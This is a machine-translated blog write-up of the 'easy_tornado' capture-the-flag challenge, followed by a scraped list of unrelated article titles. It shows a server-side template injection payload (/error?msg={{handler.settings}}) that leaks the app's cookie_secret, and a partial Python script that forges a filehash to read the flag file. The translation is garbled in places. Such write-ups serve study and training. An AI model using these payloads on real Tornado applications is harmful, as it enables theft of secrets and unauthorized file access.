当前位置:网站首页>Vulnerability recurrence easy_ tornado
Vulnerability recurrence easy_ tornado
2022-07-07 08:10:00 【_ s1mple】
[ Environmental Science ]
windows
[ Tools ]
Firefox
[ step ]
tornado yes python One of them web Application framework .
Got the title and found three documents :
flag.txt
/flag.txt
flag in /fllllllllllllagFind out flag stay /fllllllllllllag In the document ;
welcome.txt
/welcome.txt
renderrender yes python A rendering function in , Render variables into the template , That is, different pages can be formed by passing different parameters .
hints.txt
/hints.txt
md5(cookie_secret+md5(filename))filehash=md5(cookie_secret+md5(filename)) Now? filename=/fllllllllllllag, Just need to know cookie_secret Can access flag.
After the test, I found another one error Interface , The format is /error?msg=Error, It is suspected that there is a server-side template injection attack (SSTI)
Try /error?msg={ {datetime}} stay Tornado In the front-end page template ,datetime It's pointing python in datetime This module ,Tornado Some object aliases are provided to quickly access objects , You can refer to Tornado Official documents
Find... By looking up the documentation cookie_secret stay Application object settings Properties of the , Also found that self.application.settings There's an alias
RequestHandler.settings
An alias for self.application.settings.handler To handle the current page RequestHandler object , RequestHandler.settings Point to self.application.settings, therefore handler.settings Point to RequestHandler.application.settings.
structure payload obtain cookie_secret
/error?msg={
{handler.settings}}
'cookie_secret': 'M)Z.>}{O]lYIp(oW7$dc132uDaK<C%[email protected]![VtR#geh9UHsbnL_+mT5N~J84*r'Calculation filehash value :
import hashlib
def md5(s):
md5 = hashlib.md5()
md5.update(s)
return md5.hexdigest()
def filehash():
filename = '/fllllllllllllag'
cookie_secret = 'M)Z.>}{O]lYIp(oW7$dc132uDaK<C%[email protected]
【数字IC验证快速入门】11、Verilog TestBench(VTB)入门
buureservewp(2)
Thinkcmf6.0 installation tutorial
Jmeter 的使用
互动送书-《Oracle DBA工作笔记》签名版
CDC (change data capture technology), a powerful tool for real-time database synchronization
Avatary的LiveDriver试用体验
Padavan manually installs PHP
Linux server development, MySQL index principle and optimization
Myabtis_Plus
随机推荐
Thinkcmf6.0 installation tutorial
The zblog plug-in supports the plug-in pushed by Baidu Sogou 360
Leetcode 90: subset II
【数字IC验证快速入门】15、SystemVerilog学习之基本语法2(操作符、类型转换、循环、Task/Function...内含实践练习)
Blob 對象介紹
数据库实时同步利器——CDC(变化数据捕获技术)
[VHDL parallel statement execution]
ZCMU--1396: 队列问题(2)
buureservewp(2)
The element with setfieldsvalue set is obtained as undefined with GetFieldValue
JS cross browser parsing XML application
CTF-WEB shrine模板注入nmap的基本使用
【数字IC验证快速入门】12、SystemVerilog TestBench(SVTB)入门
jeeSite 表单页面的Excel 导入功能
Relevant data of current limiting
LeetCode简单题之字符串中最大的 3 位相同数字
青龙面板--花花阅读
Myabtis_Plus
It took "7" years to build the robot framework into a micro service
Bayes' law